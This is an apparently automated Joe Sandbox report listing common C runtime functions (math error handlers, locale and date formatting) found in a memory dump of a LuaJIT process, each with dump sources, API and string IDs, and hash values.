                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                                                                              • Instruction ID: 0c8c0841b6d1611c842941d039c8b7a791195e822bbacad8ca20375d92d2a008
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F61887393C60286EB64AF26804437CBBA1FB19798F941135C66A6A1D7CFACDC41CF21
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724357B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                                                                              • Instruction ID: e61e1ee0d4971fdad0d69e1a032dc61e0cff471e5b572d7890788b73f413e4bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B516C7393C20286F764AF26844437CBFA5FF09BA8F941135C56966296CFA8DC85CF21
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245B120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                              • Opcode ID: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                                                                              • Instruction ID: 906cdff85ecf7d94251afa27d5d5ea41539ba7bfb2b0011d6480cdcb9232a257
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD510A63B386C546E7659F27944136DBB91E740B90F889231DBFC4BADACE6CD844CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772450BD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: !$fmod
                                                                                                                                                                                                                              • API String ID: 1757819995-3213614193
                                                                                                                                                                                                                              • Opcode ID: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                                                                              • Instruction ID: 394544ef22427080cb3fb8810d5fdcf3478684083072cda84fd48bc4c2bba30e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351E713D39F8649E163773390157B9E798EF663C0F90A332ED69316A1DB6D6803CA10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772408050 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::rsfun
                                                                                                                                                                                                                              • String ID: $$type parameter
                                                                                                                                                                                                                              • API String ID: 3764944385-1705267328
                                                                                                                                                                                                                              • Opcode ID: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                                                                              • Instruction ID: f319d5b7eeaf0ac73a1dfc50452e5aaa537154060830e8ebe78dac556b557722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6251F437628B4586DB60DB4AE48012EF7A0F7C8BA4F544626EE9D477A4DEBCD441CF00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245CB88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                                                                              • Instruction ID: d545acef71f8b23e9128fc55fa53699f113a5fee04adb236ab626f8ba7b1b75b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9541B633739A8185DB20AF27E4443A9A7A0FB48794F914035EE9D87758DF7CD845CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: "$pow
                                                                                                                                                                                                                              • API String ID: 1757819995-713443511
                                                                                                                                                                                                                              • Opcode ID: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                                                                              • Instruction ID: 29d139b0b9c40e3e67d29f26e7c472b15f2fa9bead1b0fcdbe150b407394d6f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28212B73E38AC486D370DF12E04066ABAA1FBDA344F601325F6D906994CBBDD545DF14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724602B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_errno_from_matherr
                                                                                                                                                                                                                              • String ID: tanh
                                                                                                                                                                                                                              • API String ID: 1187470696-874243715
                                                                                                                                                                                                                              • Opcode ID: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                                                                                                                                                                                              • Instruction ID: dce2b0efe32b711048882e9721369ec30a5a2b23b575def793852bd9ead57667
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC212C77A396858BD760EF2AE48026AB2E0FF89704F901135FA9D86B55DE7CD840CF14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724595DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareStringtry_get_function
                                                                                                                                                                                                                              • String ID: CompareStringEx
                                                                                                                                                                                                                              • API String ID: 3328479835-2590796910
                                                                                                                                                                                                                              • Opcode ID: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                                                                                                                                                                                              • Instruction ID: 0600be36f9f0e492aa44251b2be9e27464da7beed4bed8c33ba482027845a713
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D112C36628B8086D760DB16F4402AAB7A0F798B90F544136EEED43B59CF7CD550CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245987C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DateFormattry_get_function
                                                                                                                                                                                                                              • String ID: GetDateFormatEx
                                                                                                                                                                                                                              • API String ID: 595753042-159735388
                                                                                                                                                                                                                              • Opcode ID: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                                                                                                                                                                                              • Instruction ID: 88f0b8603d47030bf5f31344602f8bcc7528a3d377a1333b0f2b59a14be9f892
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE111F32A28B81C6E610EB56F44009AB7A0FB98BD0F544136EEAD43B59CE7CDA14CF50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724599B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FormatTimetry_get_function
                                                                                                                                                                                                                              • String ID: GetTimeFormatEx
                                                                                                                                                                                                                              • API String ID: 3261793192-1692793031
                                                                                                                                                                                                                              • Opcode ID: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                                                                                                                                                                                              • Instruction ID: 93d840033306ec24218a5c616d0609b86eef786bb5354c06d09a92b2dfe07137
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5113032A28781C6E610AB57E40005AA7A0FB98BD0F584135EEAD47B69CE7CDA50CF50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724314A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                                                                                                                                                                                              • Instruction ID: b1fe51eb42620d6dd00bc500e370609947956c9ed5297a93e8ab4a74c29de7d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7118F33628B8182EB509F16E400269B7F0FB88B94F985230DE9D17B55DF7CD851CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772455A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: !$sqrt
                                                                                                                                                                                                                              • API String ID: 1757819995-799759792
                                                                                                                                                                                                                              • Opcode ID: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                                                                                                                                                                                              • Instruction ID: 4d9b33d44cf60c29767c5a7f834c6e12e8d390654adb995f7a3a88aeb03086cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5118677E38B8582DA01DF16914033AA261BFD67E4F608321FDB8066D8DF6CE445DE00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245F010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
